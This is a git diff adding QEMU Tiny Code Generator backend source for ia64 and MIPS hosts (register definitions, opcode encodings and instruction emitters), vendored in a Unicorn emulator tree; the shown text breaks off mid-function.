a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ia64/tcg-target.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ia64/tcg-target.h new file mode 100644 index 0000000..b8b2693 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ia64/tcg-target.h @@ -0,0 +1,183 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2009-2010 Aurelien Jarno + * Based on i386/tcg-target.c - Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. 
+ * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +#ifndef TCG_TARGET_IA64 +#define TCG_TARGET_IA64 1 + +#define TCG_TARGET_INSN_UNIT_SIZE 16 +typedef struct { + uint64_t QEMU_ALIGN(16, lo); + uint64_t hi; +} tcg_insn_unit; + +/* We only map the first 64 registers */ +#define TCG_TARGET_NB_REGS 64 +typedef enum { + TCG_REG_R0 = 0, + TCG_REG_R1, + TCG_REG_R2, + TCG_REG_R3, + TCG_REG_R4, + TCG_REG_R5, + TCG_REG_R6, + TCG_REG_R7, + TCG_REG_R8, + TCG_REG_R9, + TCG_REG_R10, + TCG_REG_R11, + TCG_REG_R12, + TCG_REG_R13, + TCG_REG_R14, + TCG_REG_R15, + TCG_REG_R16, + TCG_REG_R17, + TCG_REG_R18, + TCG_REG_R19, + TCG_REG_R20, + TCG_REG_R21, + TCG_REG_R22, + TCG_REG_R23, + TCG_REG_R24, + TCG_REG_R25, + TCG_REG_R26, + TCG_REG_R27, + TCG_REG_R28, + TCG_REG_R29, + TCG_REG_R30, + TCG_REG_R31, + TCG_REG_R32, + TCG_REG_R33, + TCG_REG_R34, + TCG_REG_R35, + TCG_REG_R36, + TCG_REG_R37, + TCG_REG_R38, + TCG_REG_R39, + TCG_REG_R40, + TCG_REG_R41, + TCG_REG_R42, + TCG_REG_R43, + TCG_REG_R44, + TCG_REG_R45, + TCG_REG_R46, + TCG_REG_R47, + TCG_REG_R48, + TCG_REG_R49, + TCG_REG_R50, + TCG_REG_R51, + TCG_REG_R52, + TCG_REG_R53, + TCG_REG_R54, + TCG_REG_R55, + TCG_REG_R56, + TCG_REG_R57, + TCG_REG_R58, + TCG_REG_R59, + TCG_REG_R60, + TCG_REG_R61, + TCG_REG_R62, + TCG_REG_R63, + + TCG_AREG0 = TCG_REG_R32, +} TCGReg; + +#define TCG_CT_CONST_ZERO 0x100 +#define TCG_CT_CONST_S22 0x200 + +/* used for function call generation */ +#define TCG_REG_CALL_STACK TCG_REG_R12 +#define TCG_TARGET_STACK_ALIGN 16 +#define TCG_TARGET_CALL_STACK_OFFSET 16 + +/* optional 
instructions */ +#define TCG_TARGET_HAS_div_i32 0 +#define TCG_TARGET_HAS_rem_i32 0 +#define TCG_TARGET_HAS_div_i64 0 +#define TCG_TARGET_HAS_rem_i64 0 +#define TCG_TARGET_HAS_andc_i32 1 +#define TCG_TARGET_HAS_andc_i64 1 +#define TCG_TARGET_HAS_bswap16_i32 1 +#define TCG_TARGET_HAS_bswap16_i64 1 +#define TCG_TARGET_HAS_bswap32_i32 1 +#define TCG_TARGET_HAS_bswap32_i64 1 +#define TCG_TARGET_HAS_bswap64_i64 1 +#define TCG_TARGET_HAS_eqv_i32 1 +#define TCG_TARGET_HAS_eqv_i64 1 +#define TCG_TARGET_HAS_ext8s_i32 1 +#define TCG_TARGET_HAS_ext16s_i32 1 +#define TCG_TARGET_HAS_ext8s_i64 1 +#define TCG_TARGET_HAS_ext16s_i64 1 +#define TCG_TARGET_HAS_ext32s_i64 1 +#define TCG_TARGET_HAS_ext8u_i32 1 +#define TCG_TARGET_HAS_ext16u_i32 1 +#define TCG_TARGET_HAS_ext8u_i64 1 +#define TCG_TARGET_HAS_ext16u_i64 1 +#define TCG_TARGET_HAS_ext32u_i64 1 +#define TCG_TARGET_HAS_nand_i32 1 +#define TCG_TARGET_HAS_nand_i64 1 +#define TCG_TARGET_HAS_nor_i32 1 +#define TCG_TARGET_HAS_nor_i64 1 +#define TCG_TARGET_HAS_orc_i32 1 +#define TCG_TARGET_HAS_orc_i64 1 +#define TCG_TARGET_HAS_rot_i32 1 +#define TCG_TARGET_HAS_rot_i64 1 +#define TCG_TARGET_HAS_movcond_i32 1 +#define TCG_TARGET_HAS_movcond_i64 1 +#define TCG_TARGET_HAS_deposit_i32 1 +#define TCG_TARGET_HAS_deposit_i64 1 +#define TCG_TARGET_HAS_add2_i32 0 +#define TCG_TARGET_HAS_add2_i64 0 +#define TCG_TARGET_HAS_sub2_i32 0 +#define TCG_TARGET_HAS_sub2_i64 0 +#define TCG_TARGET_HAS_mulu2_i32 0 +#define TCG_TARGET_HAS_mulu2_i64 0 +#define TCG_TARGET_HAS_muls2_i32 0 +#define TCG_TARGET_HAS_muls2_i64 0 +#define TCG_TARGET_HAS_muluh_i32 0 +#define TCG_TARGET_HAS_muluh_i64 0 +#define TCG_TARGET_HAS_mulsh_i32 0 +#define TCG_TARGET_HAS_mulsh_i64 0 +#define TCG_TARGET_HAS_trunc_shr_i32 0 + +#define TCG_TARGET_deposit_i32_valid(ofs, len) ((len) <= 16) +#define TCG_TARGET_deposit_i64_valid(ofs, len) ((len) <= 16) + +/* optional instructions automatically implemented */ +#define TCG_TARGET_HAS_neg_i32 0 /* sub r1, r0, r3 */ +#define 
TCG_TARGET_HAS_neg_i64 0 /* sub r1, r0, r3 */ +#define TCG_TARGET_HAS_not_i32 0 /* xor r1, -1, r3 */ +#define TCG_TARGET_HAS_not_i64 0 /* xor r1, -1, r3 */ + +static inline void flush_icache_range(uintptr_t start, uintptr_t stop) +{ + start = start & ~(32UL - 1UL); + stop = (stop + (32UL - 1UL)) & ~(32UL - 1UL); + + for (; start < stop; start += 32UL) { + asm volatile ("fc.i %0" :: "r" (start)); + } + asm volatile (";;sync.i;;srlz.i;;"); +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/mips/tcg-target.c b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/mips/tcg-target.c new file mode 100644 index 0000000..3b53bb7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/mips/tcg-target.c @@ -0,0 +1,1816 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008-2009 Arnaud Patard + * Copyright (c) 2009 Aurelien Jarno + * Based on i386/tcg-target.c - Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#include "tcg-be-ldst.h" + +#ifdef HOST_WORDS_BIGENDIAN +# define MIPS_BE 1 +#else +# define MIPS_BE 0 +#endif + +#define LO_OFF (MIPS_BE * 4) +#define HI_OFF (4 - LO_OFF) + +#ifndef NDEBUG +static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { + "zero", + "at", + "v0", + "v1", + "a0", + "a1", + "a2", + "a3", + "t0", + "t1", + "t2", + "t3", + "t4", + "t5", + "t6", + "t7", + "s0", + "s1", + "s2", + "s3", + "s4", + "s5", + "s6", + "s7", + "t8", + "t9", + "k0", + "k1", + "gp", + "sp", + "s8", + "ra", +}; +#endif + +#define TCG_TMP0 TCG_REG_AT +#define TCG_TMP1 TCG_REG_T9 + +/* check if we really need so many registers :P */ +static const TCGReg tcg_target_reg_alloc_order[] = { + /* Call saved registers. */ + TCG_REG_S0, + TCG_REG_S1, + TCG_REG_S2, + TCG_REG_S3, + TCG_REG_S4, + TCG_REG_S5, + TCG_REG_S6, + TCG_REG_S7, + TCG_REG_S8, + + /* Call clobbered registers. */ + TCG_REG_T0, + TCG_REG_T1, + TCG_REG_T2, + TCG_REG_T3, + TCG_REG_T4, + TCG_REG_T5, + TCG_REG_T6, + TCG_REG_T7, + TCG_REG_T8, + TCG_REG_T9, + TCG_REG_V1, + TCG_REG_V0, + + /* Argument registers, opposite order of allocation. */ + TCG_REG_A3, + TCG_REG_A2, + TCG_REG_A1, + TCG_REG_A0, +}; + +static const TCGReg tcg_target_call_iarg_regs[4] = { + TCG_REG_A0, + TCG_REG_A1, + TCG_REG_A2, + TCG_REG_A3 +}; + +static const TCGReg tcg_target_call_oarg_regs[2] = { + TCG_REG_V0, + TCG_REG_V1 +}; + +static tcg_insn_unit *tb_ret_addr; + +static inline uint32_t reloc_pc16_val(tcg_insn_unit *pc, tcg_insn_unit *target) +{ + /* Let the compiler perform the right-shift as part of the arithmetic. 
*/ + ptrdiff_t disp = target - (pc + 1); + assert(disp == (int16_t)disp); + return disp & 0xffff; +} + +static inline void reloc_pc16(tcg_insn_unit *pc, tcg_insn_unit *target) +{ + *pc = deposit32(*pc, 0, 16, reloc_pc16_val(pc, target)); +} + +static inline uint32_t reloc_26_val(tcg_insn_unit *pc, tcg_insn_unit *target) +{ + assert((((uintptr_t)pc ^ (uintptr_t)target) & 0xf0000000) == 0); + return ((uintptr_t)target >> 2) & 0x3ffffff; +} + +static inline void reloc_26(tcg_insn_unit *pc, tcg_insn_unit *target) +{ + *pc = deposit32(*pc, 0, 26, reloc_26_val(pc, target)); +} + +static void patch_reloc(tcg_insn_unit *code_ptr, int type, + intptr_t value, intptr_t addend) +{ + assert(type == R_MIPS_PC16); + assert(addend == 0); + reloc_pc16(code_ptr, (tcg_insn_unit *)value); +} + +#define TCG_CT_CONST_ZERO 0x100 +#define TCG_CT_CONST_U16 0x200 /* Unsigned 16-bit: 0 - 0xffff. */ +#define TCG_CT_CONST_S16 0x400 /* Signed 16-bit: -32768 - 32767 */ +#define TCG_CT_CONST_P2M1 0x800 /* Power of 2 minus 1. 
*/ +#define TCG_CT_CONST_N16 0x1000 /* "Negatable" 16-bit: -32767 - 32767 */ + +static inline bool is_p2m1(tcg_target_long val) +{ + return val && ((val + 1) & val) == 0; +} + +/* parse target specific constraints */ +static int target_parse_constraint(TCGArgConstraint *ct, const char **pct_str) +{ + const char *ct_str; + + ct_str = *pct_str; + switch(ct_str[0]) { + case 'r': + ct->ct |= TCG_CT_REG; + tcg_regset_set(ct->u.regs, 0xffffffff); + break; + case 'L': /* qemu_ld output arg constraint */ + ct->ct |= TCG_CT_REG; + tcg_regset_set(ct->u.regs, 0xffffffff); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_V0); + break; + case 'l': /* qemu_ld input arg constraint */ + ct->ct |= TCG_CT_REG; + tcg_regset_set(ct->u.regs, 0xffffffff); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_A0); +#if defined(CONFIG_SOFTMMU) + if (TARGET_LONG_BITS == 64) { + tcg_regset_reset_reg(ct->u.regs, TCG_REG_A2); + } +#endif + break; + case 'S': /* qemu_st constraint */ + ct->ct |= TCG_CT_REG; + tcg_regset_set(ct->u.regs, 0xffffffff); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_A0); +#if defined(CONFIG_SOFTMMU) + if (TARGET_LONG_BITS == 32) { + tcg_regset_reset_reg(ct->u.regs, TCG_REG_A1); + } else { + tcg_regset_reset_reg(ct->u.regs, TCG_REG_A2); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_A3); + } +#endif + break; + case 'I': + ct->ct |= TCG_CT_CONST_U16; + break; + case 'J': + ct->ct |= TCG_CT_CONST_S16; + break; + case 'K': + ct->ct |= TCG_CT_CONST_P2M1; + break; + case 'N': + ct->ct |= TCG_CT_CONST_N16; + break; + case 'Z': + /* We are cheating a bit here, using the fact that the register + ZERO is also the register number 0. Hence there is no need + to check for const_args in each instruction. 
*/ + ct->ct |= TCG_CT_CONST_ZERO; + break; + default: + return -1; + } + ct_str++; + *pct_str = ct_str; + return 0; +} + +/* test if a constant matches the constraint */ +static inline int tcg_target_const_match(tcg_target_long val, TCGType type, + const TCGArgConstraint *arg_ct) +{ + int ct; + ct = arg_ct->ct; + if (ct & TCG_CT_CONST) { + return 1; + } else if ((ct & TCG_CT_CONST_ZERO) && val == 0) { + return 1; + } else if ((ct & TCG_CT_CONST_U16) && val == (uint16_t)val) { + return 1; + } else if ((ct & TCG_CT_CONST_S16) && val == (int16_t)val) { + return 1; + } else if ((ct & TCG_CT_CONST_N16) && val >= -32767 && val <= 32767) { + return 1; + } else if ((ct & TCG_CT_CONST_P2M1) + && use_mips32r2_instructions && is_p2m1(val)) { + return 1; + } + return 0; +} + +/* instruction opcodes */ +typedef enum { + OPC_J = 0x02 << 26, + OPC_JAL = 0x03 << 26, + OPC_BEQ = 0x04 << 26, + OPC_BNE = 0x05 << 26, + OPC_BLEZ = 0x06 << 26, + OPC_BGTZ = 0x07 << 26, + OPC_ADDIU = 0x09 << 26, + OPC_SLTI = 0x0A << 26, + OPC_SLTIU = 0x0B << 26, + OPC_ANDI = 0x0C << 26, + OPC_ORI = 0x0D << 26, + OPC_XORI = 0x0E << 26, + OPC_LUI = 0x0F << 26, + OPC_LB = 0x20 << 26, + OPC_LH = 0x21 << 26, + OPC_LW = 0x23 << 26, + OPC_LBU = 0x24 << 26, + OPC_LHU = 0x25 << 26, + OPC_LWU = 0x27 << 26, + OPC_SB = 0x28 << 26, + OPC_SH = 0x29 << 26, + OPC_SW = 0x2B << 26, + + OPC_SPECIAL = 0x00 << 26, + OPC_SLL = OPC_SPECIAL | 0x00, + OPC_SRL = OPC_SPECIAL | 0x02, + OPC_ROTR = OPC_SPECIAL | (0x01 << 21) | 0x02, + OPC_SRA = OPC_SPECIAL | 0x03, + OPC_SLLV = OPC_SPECIAL | 0x04, + OPC_SRLV = OPC_SPECIAL | 0x06, + OPC_ROTRV = OPC_SPECIAL | (0x01 << 6) | 0x06, + OPC_SRAV = OPC_SPECIAL | 0x07, + OPC_JR = OPC_SPECIAL | 0x08, + OPC_JALR = OPC_SPECIAL | 0x09, + OPC_MOVZ = OPC_SPECIAL | 0x0A, + OPC_MOVN = OPC_SPECIAL | 0x0B, + OPC_MFHI = OPC_SPECIAL | 0x10, + OPC_MFLO = OPC_SPECIAL | 0x12, + OPC_MULT = OPC_SPECIAL | 0x18, + OPC_MULTU = OPC_SPECIAL | 0x19, + OPC_DIV = OPC_SPECIAL | 0x1A, + OPC_DIVU = OPC_SPECIAL | 0x1B, + 
OPC_ADDU = OPC_SPECIAL | 0x21, + OPC_SUBU = OPC_SPECIAL | 0x23, + OPC_AND = OPC_SPECIAL | 0x24, + OPC_OR = OPC_SPECIAL | 0x25, + OPC_XOR = OPC_SPECIAL | 0x26, + OPC_NOR = OPC_SPECIAL | 0x27, + OPC_SLT = OPC_SPECIAL | 0x2A, + OPC_SLTU = OPC_SPECIAL | 0x2B, + + OPC_REGIMM = 0x01 << 26, + OPC_BLTZ = OPC_REGIMM | (0x00 << 16), + OPC_BGEZ = OPC_REGIMM | (0x01 << 16), + + OPC_SPECIAL2 = 0x1c << 26, + OPC_MUL = OPC_SPECIAL2 | 0x002, + + OPC_SPECIAL3 = 0x1f << 26, + OPC_EXT = OPC_SPECIAL3 | 0x000, + OPC_INS = OPC_SPECIAL3 | 0x004, + OPC_WSBH = OPC_SPECIAL3 | 0x0a0, + OPC_SEB = OPC_SPECIAL3 | 0x420, + OPC_SEH = OPC_SPECIAL3 | 0x620, +} MIPSInsn; + +/* + * Type reg + */ +static inline void tcg_out_opc_reg(TCGContext *s, MIPSInsn opc, + TCGReg rd, TCGReg rs, TCGReg rt) +{ + int32_t inst; + + inst = opc; + inst |= (rs & 0x1F) << 21; + inst |= (rt & 0x1F) << 16; + inst |= (rd & 0x1F) << 11; + tcg_out32(s, inst); +} + +/* + * Type immediate + */ +static inline void tcg_out_opc_imm(TCGContext *s, MIPSInsn opc, + TCGReg rt, TCGReg rs, TCGArg imm) +{ + int32_t inst; + + inst = opc; + inst |= (rs & 0x1F) << 21; + inst |= (rt & 0x1F) << 16; + inst |= (imm & 0xffff); + tcg_out32(s, inst); +} + +/* + * Type bitfield + */ +static inline void tcg_out_opc_bf(TCGContext *s, MIPSInsn opc, TCGReg rt, + TCGReg rs, int msb, int lsb) +{ + int32_t inst; + + inst = opc; + inst |= (rs & 0x1F) << 21; + inst |= (rt & 0x1F) << 16; + inst |= (msb & 0x1F) << 11; + inst |= (lsb & 0x1F) << 6; + tcg_out32(s, inst); +} + +/* + * Type branch + */ +static inline void tcg_out_opc_br(TCGContext *s, MIPSInsn opc, + TCGReg rt, TCGReg rs) +{ + /* We pay attention here to not modify the branch target by reading + the existing value and using it again. This ensure that caches and + memory are kept coherent during retranslation. 
*/ + uint16_t offset = (uint16_t)*s->code_ptr; + + tcg_out_opc_imm(s, opc, rt, rs, offset); +} + +/* + * Type sa + */ +static inline void tcg_out_opc_sa(TCGContext *s, MIPSInsn opc, + TCGReg rd, TCGReg rt, TCGArg sa) +{ + int32_t inst; + + inst = opc; + inst |= (rt & 0x1F) << 16; + inst |= (rd & 0x1F) << 11; + inst |= (sa & 0x1F) << 6; + tcg_out32(s, inst); + +} + +/* + * Type jump. + * Returns true if the branch was in range and the insn was emitted. + */ +static bool tcg_out_opc_jmp(TCGContext *s, MIPSInsn opc, void *target) +{ + uintptr_t dest = (uintptr_t)target; + uintptr_t from = (uintptr_t)s->code_ptr + 4; + int32_t inst; + + /* The pc-region branch happens within the 256MB region of + the delay slot (thus the +4). */ + if ((from ^ dest) & -(1 << 28)) { + return false; + } + assert((dest & 3) == 0); + + inst = opc; + inst |= (dest >> 2) & 0x3ffffff; + tcg_out32(s, inst); + return true; +} + +static inline void tcg_out_nop(TCGContext *s) +{ + tcg_out32(s, 0); +} + +static inline void tcg_out_mov(TCGContext *s, TCGType type, + TCGReg ret, TCGReg arg) +{ + /* Simple reg-reg move, optimising out the 'do nothing' case */ + if (ret != arg) { + tcg_out_opc_reg(s, OPC_ADDU, ret, arg, TCG_REG_ZERO); + } +} + +static inline void tcg_out_movi(TCGContext *s, TCGType type, + TCGReg reg, tcg_target_long arg) +{ + if (arg == (int16_t)arg) { + tcg_out_opc_imm(s, OPC_ADDIU, reg, TCG_REG_ZERO, arg); + } else if (arg == (uint16_t)arg) { + tcg_out_opc_imm(s, OPC_ORI, reg, TCG_REG_ZERO, arg); + } else { + tcg_out_opc_imm(s, OPC_LUI, reg, TCG_REG_ZERO, arg >> 16); + if (arg & 0xffff) { + tcg_out_opc_imm(s, OPC_ORI, reg, reg, arg & 0xffff); + } + } +} + +static inline void tcg_out_bswap16(TCGContext *s, TCGReg ret, TCGReg arg) +{ + if (use_mips32r2_instructions) { + tcg_out_opc_reg(s, OPC_WSBH, ret, 0, arg); + } else { + /* ret and arg can't be register at */ + if (ret == TCG_TMP0 || arg == TCG_TMP0) { + tcg_abort(); + } + + tcg_out_opc_sa(s, OPC_SRL, TCG_TMP0, arg, 8); + 
tcg_out_opc_sa(s, OPC_SLL, ret, arg, 8); + tcg_out_opc_imm(s, OPC_ANDI, ret, ret, 0xff00); + tcg_out_opc_reg(s, OPC_OR, ret, ret, TCG_TMP0); + } +} + +static inline void tcg_out_bswap16s(TCGContext *s, TCGReg ret, TCGReg arg) +{ + if (use_mips32r2_instructions) { + tcg_out_opc_reg(s, OPC_WSBH, ret, 0, arg); + tcg_out_opc_reg(s, OPC_SEH, ret, 0, ret); + } else { + /* ret and arg can't be register at */ + if (ret == TCG_TMP0 || arg == TCG_TMP0) { + tcg_abort(); + } + + tcg_out_opc_sa(s, OPC_SRL, TCG_TMP0, arg, 8); + tcg_out_opc_sa(s, OPC_SLL, ret, arg, 24); + tcg_out_opc_sa(s, OPC_SRA, ret, ret, 16); + tcg_out_opc_reg(s, OPC_OR, ret, ret, TCG_TMP0); + } +} + +static inline void tcg_out_bswap32(TCGContext *s, TCGReg ret, TCGReg arg) +{ + if (use_mips32r2_instructions) { + tcg_out_opc_reg(s, OPC_WSBH, ret, 0, arg); + tcg_out_opc_sa(s, OPC_ROTR, ret, ret, 16); + } else { + /* ret and arg must be different and can't be register at */ + if (ret == arg || ret == TCG_TMP0 || arg == TCG_TMP0) { + tcg_abort(); + } + + tcg_out_opc_sa(s, OPC_SLL, ret, arg, 24); + + tcg_out_opc_sa(s, OPC_SRL, TCG_TMP0, arg, 24); + tcg_out_opc_reg(s, OPC_OR, ret, ret, TCG_TMP0); + + tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP0, arg, 0xff00); + tcg_out_opc_sa(s, OPC_SLL, TCG_TMP0, TCG_TMP0, 8); + tcg_out_opc_reg(s, OPC_OR, ret, ret, TCG_TMP0); + + tcg_out_opc_sa(s, OPC_SRL, TCG_TMP0, arg, 8); + tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP0, TCG_TMP0, 0xff00); + tcg_out_opc_reg(s, OPC_OR, ret, ret, TCG_TMP0); + } +} + +static inline void tcg_out_ext8s(TCGContext *s, TCGReg ret, TCGReg arg) +{ + if (use_mips32r2_instructions) { + tcg_out_opc_reg(s, OPC_SEB, ret, 0, arg); + } else { + tcg_out_opc_sa(s, OPC_SLL, ret, arg, 24); + tcg_out_opc_sa(s, OPC_SRA, ret, ret, 24); + } +} + +static inline void tcg_out_ext16s(TCGContext *s, TCGReg ret, TCGReg arg) +{ + if (use_mips32r2_instructions) { + tcg_out_opc_reg(s, OPC_SEH, ret, 0, arg); + } else { + tcg_out_opc_sa(s, OPC_SLL, ret, arg, 16); + tcg_out_opc_sa(s, OPC_SRA, 
ret, ret, 16); + } +} + +static void tcg_out_ldst(TCGContext *s, MIPSInsn opc, TCGReg data, + TCGReg addr, intptr_t ofs) +{ + int16_t lo = ofs; + if (ofs != lo) { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, ofs - lo); + if (addr != TCG_REG_ZERO) { + tcg_out_opc_reg(s, OPC_ADDU, TCG_TMP0, TCG_TMP0, addr); + } + addr = TCG_TMP0; + } + tcg_out_opc_imm(s, opc, data, addr, lo); +} + +static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg arg, + TCGReg arg1, intptr_t arg2) +{ + tcg_out_ldst(s, OPC_LW, arg, arg1, arg2); +} + +static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, + TCGReg arg1, intptr_t arg2) +{ + tcg_out_ldst(s, OPC_SW, arg, arg1, arg2); +} + +static inline void tcg_out_addi(TCGContext *s, TCGReg reg, TCGArg val) +{ + if (val == (int16_t)val) { + tcg_out_opc_imm(s, OPC_ADDIU, reg, reg, val); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, val); + tcg_out_opc_reg(s, OPC_ADDU, reg, reg, TCG_TMP0); + } +} + +/* Bit 0 set if inversion required; bit 1 set if swapping required. 
*/ +#define MIPS_CMP_INV 1 +#define MIPS_CMP_SWAP 2 + +static const uint8_t mips_cmp_map[16] = { + [TCG_COND_LT] = 0, + [TCG_COND_LTU] = 0, + [TCG_COND_GE] = MIPS_CMP_INV, + [TCG_COND_GEU] = MIPS_CMP_INV, + [TCG_COND_LE] = MIPS_CMP_INV | MIPS_CMP_SWAP, + [TCG_COND_LEU] = MIPS_CMP_INV | MIPS_CMP_SWAP, + [TCG_COND_GT] = MIPS_CMP_SWAP, + [TCG_COND_GTU] = MIPS_CMP_SWAP, +}; + +static void tcg_out_setcond(TCGContext *s, TCGCond cond, TCGReg ret, + TCGReg arg1, TCGReg arg2) +{ + MIPSInsn s_opc = OPC_SLTU; + int cmp_map; + + switch (cond) { + case TCG_COND_EQ: + if (arg2 != 0) { + tcg_out_opc_reg(s, OPC_XOR, ret, arg1, arg2); + arg1 = ret; + } + tcg_out_opc_imm(s, OPC_SLTIU, ret, arg1, 1); + break; + + case TCG_COND_NE: + if (arg2 != 0) { + tcg_out_opc_reg(s, OPC_XOR, ret, arg1, arg2); + arg1 = ret; + } + tcg_out_opc_reg(s, OPC_SLTU, ret, TCG_REG_ZERO, arg1); + break; + + case TCG_COND_LT: + case TCG_COND_GE: + case TCG_COND_LE: + case TCG_COND_GT: + s_opc = OPC_SLT; + /* FALLTHRU */ + + case TCG_COND_LTU: + case TCG_COND_GEU: + case TCG_COND_LEU: + case TCG_COND_GTU: + cmp_map = mips_cmp_map[cond]; + if (cmp_map & MIPS_CMP_SWAP) { + TCGReg t = arg1; + arg1 = arg2; + arg2 = t; + } + tcg_out_opc_reg(s, s_opc, ret, arg1, arg2); + if (cmp_map & MIPS_CMP_INV) { + tcg_out_opc_imm(s, OPC_XORI, ret, ret, 1); + } + break; + + default: + tcg_abort(); + break; + } +} + +static void tcg_out_brcond(TCGContext *s, TCGCond cond, TCGReg arg1, + TCGReg arg2, int label_index) +{ + static const MIPSInsn b_zero[16] = { + [TCG_COND_LT] = OPC_BLTZ, + [TCG_COND_GT] = OPC_BGTZ, + [TCG_COND_LE] = OPC_BLEZ, + [TCG_COND_GE] = OPC_BGEZ, + }; + + TCGLabel *l; + MIPSInsn s_opc = OPC_SLTU; + MIPSInsn b_opc; + int cmp_map; + + switch (cond) { + case TCG_COND_EQ: + b_opc = OPC_BEQ; + break; + case TCG_COND_NE: + b_opc = OPC_BNE; + break; + + case TCG_COND_LT: + case TCG_COND_GT: + case TCG_COND_LE: + case TCG_COND_GE: + if (arg2 == 0) { + b_opc = b_zero[cond]; + arg2 = arg1; + arg1 = 0; + break; + } + 
s_opc = OPC_SLT; + /* FALLTHRU */ + + case TCG_COND_LTU: + case TCG_COND_GTU: + case TCG_COND_LEU: + case TCG_COND_GEU: + cmp_map = mips_cmp_map[cond]; + if (cmp_map & MIPS_CMP_SWAP) { + TCGReg t = arg1; + arg1 = arg2; + arg2 = t; + } + tcg_out_opc_reg(s, s_opc, TCG_TMP0, arg1, arg2); + b_opc = (cmp_map & MIPS_CMP_INV ? OPC_BEQ : OPC_BNE); + arg1 = TCG_TMP0; + arg2 = TCG_REG_ZERO; + break; + + default: + tcg_abort(); + break; + } + + tcg_out_opc_br(s, b_opc, arg1, arg2); + l = &s->labels[label_index]; + if (l->has_value) { + reloc_pc16(s->code_ptr - 1, l->u.value_ptr); + } else { + tcg_out_reloc(s, s->code_ptr - 1, R_MIPS_PC16, label_index, 0); + } + tcg_out_nop(s); +} + +static TCGReg tcg_out_reduce_eq2(TCGContext *s, TCGReg tmp0, TCGReg tmp1, + TCGReg al, TCGReg ah, + TCGReg bl, TCGReg bh) +{ + /* Merge highpart comparison into AH. */ + if (bh != 0) { + if (ah != 0) { + tcg_out_opc_reg(s, OPC_XOR, tmp0, ah, bh); + ah = tmp0; + } else { + ah = bh; + } + } + /* Merge lowpart comparison into AL. */ + if (bl != 0) { + if (al != 0) { + tcg_out_opc_reg(s, OPC_XOR, tmp1, al, bl); + al = tmp1; + } else { + al = bl; + } + } + /* Merge high and low part comparisons into AL. 
*/ + if (ah != 0) { + if (al != 0) { + tcg_out_opc_reg(s, OPC_OR, tmp0, ah, al); + al = tmp0; + } else { + al = ah; + } + } + return al; +} + +static void tcg_out_setcond2(TCGContext *s, TCGCond cond, TCGReg ret, + TCGReg al, TCGReg ah, TCGReg bl, TCGReg bh) +{ + TCGReg tmp0 = TCG_TMP0; + TCGReg tmp1 = ret; + + assert(ret != TCG_TMP0); + if (ret == ah || ret == bh) { + assert(ret != TCG_TMP1); + tmp1 = TCG_TMP1; + } + + switch (cond) { + case TCG_COND_EQ: + case TCG_COND_NE: + tmp1 = tcg_out_reduce_eq2(s, tmp0, tmp1, al, ah, bl, bh); + tcg_out_setcond(s, cond, ret, tmp1, TCG_REG_ZERO); + break; + + default: + tcg_out_setcond(s, TCG_COND_EQ, tmp0, ah, bh); + tcg_out_setcond(s, tcg_unsigned_cond(cond), tmp1, al, bl); + tcg_out_opc_reg(s, OPC_AND, tmp1, tmp1, tmp0); + tcg_out_setcond(s, tcg_high_cond(cond), tmp0, ah, bh); + tcg_out_opc_reg(s, OPC_OR, ret, tmp1, tmp0); + break; + } +} + +static void tcg_out_brcond2(TCGContext *s, TCGCond cond, TCGReg al, TCGReg ah, + TCGReg bl, TCGReg bh, int label_index) +{ + TCGCond b_cond = TCG_COND_NE; + TCGReg tmp = TCG_TMP1; + + /* With branches, we emit between 4 and 9 insns with 2 or 3 